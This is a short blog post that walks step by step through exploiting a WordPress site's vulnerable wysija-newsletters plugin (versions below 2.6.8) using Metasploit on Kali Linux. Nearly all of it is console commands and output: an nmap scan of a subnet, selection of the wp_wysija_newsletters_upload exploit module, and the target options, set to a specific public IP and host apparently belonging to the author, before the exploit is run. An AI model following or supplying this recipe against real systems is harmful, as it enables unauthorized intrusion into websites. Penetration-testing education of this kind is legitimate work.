Myles Braithwaite

This is a quick blog post about exploiting a WordPress website using Metasploit on Kali Linux.

Identify a Remote Host

msf > db_nmap -v -sV 192.168.111.xxx
Scan an Entire Network

This will save the results to the metasploit database

msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
  • hosts will list all the hosts found by nmap.
  • hosts -R will add them to the list of hosts to exploit.

Searching for a WordPress Vulnerability

msf > search name:wordpress

Use an Exploit

This will select an exploit to use:

msf > use exploit/unix/webapp/wp_wysija_newsletters_upload

This will show you the attacks that the exploit will take advantage of:

msf exploit(wp_wysija_newsletters_upload) > show payloads

This will show what software and version will be targeted:

msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets:

    Id  Name
    --  ----
    0   wysija-newsletter < 2.6.8

Next configure the Exploit

msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletter_upload):

    Name        Current Settings    Required    Description
    ----        ----------------    --------    -----------
    Proxies                         no          A proxy chain of format type:host:port[,type:host:port][...]
    RHOST                       no          The target address
    RPORT       80                  yes         The target port
    SSL         false               no          Negotiate SSL/TLS for outgoing connections
    TARGETURI   /                   no          The base path to the wordpress application
    VHOST                           no          HTTP server virtual host

Exploit target:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8

Here is where we set all the options:

msf exploit(wp_wysija_newsletters_upload) > set RHOST 159.203.19.77
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life

Run the Exploit

msf exploit(wp_wysija_newsletters_upload) > exploit
Read this next
You might enjoy